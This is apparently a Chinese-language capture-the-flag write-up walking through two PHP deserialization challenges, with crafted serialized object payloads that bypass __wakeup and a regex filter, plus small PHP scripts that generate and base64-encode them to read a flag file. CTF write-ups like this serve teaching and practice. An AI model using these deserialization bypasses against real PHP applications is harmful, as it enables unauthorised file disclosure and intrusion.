两道反序列化例题

1.Web_php_unserialize

先代码审计，发现定义了demo类，而在其中有一句

这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中，于是需要构造反序列化的demo类，且要绕过wake_up函数，根据上篇可知，只要输入的数据数少于规定的就可以绕过。于是需要构造

O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";}   //原构造，未构建任何绕过
O:4:"demo":2:{s:10:"Demofile";s:8:"fl4g.php";}   //尝试绕过wake_up()
O:+4:"demo":2:{s:10:"Demofile";s:8:"fl4g.php";}  //在前面将4改为+4绕过正则匹配

正则匹配解析preg_match('/[oc]:\d+:/i', $var) 
在var中检测是否为  o:数字  或  c:数字   开头

而在这里有base64的一次解码所以需要base64加密后再上传

于是在vscode上构造base64转化

<?php 
class Demo { 
    private $file = 'fl4g.php';
}
$s='O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}';
$x= serialize(new Demo);
$x=str_replace('O:4', 'O:+4',$x);
$x=str_replace(':1:', ':3:',$x);
echo base64_encode($s);
echo '      ';
echo base64_encode($x);
?>

在这里我构造了两个结果，最后出来的结果不相同，s将全部的序列化值直接转为base64而x为将fl4g.php转化为序列化后再通过代码修改序列化结果进行反序列化，但最后结果不同，使用base64解码回去发现用函数序列化的有特殊字符，所以必须用函数序列化。

 

 将base64后的值传参给var得到flag

 2.unserialize3

 又是_wakeup()函数

写代码用vscode绕过调试

<?php 
class xctf { 
    public $flag = '111';
}
$x= serialize(new xctf);
$x=str_replace(':1:', ':3:',$x);
echo $x;
?>

 

 传参后得到

总结

下次总结一下文件包含和伪协议，因为发现反序列化里有不少题目也用到了ssrf之类的知识，所以要学习一下再来做反序列化总结（续）

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2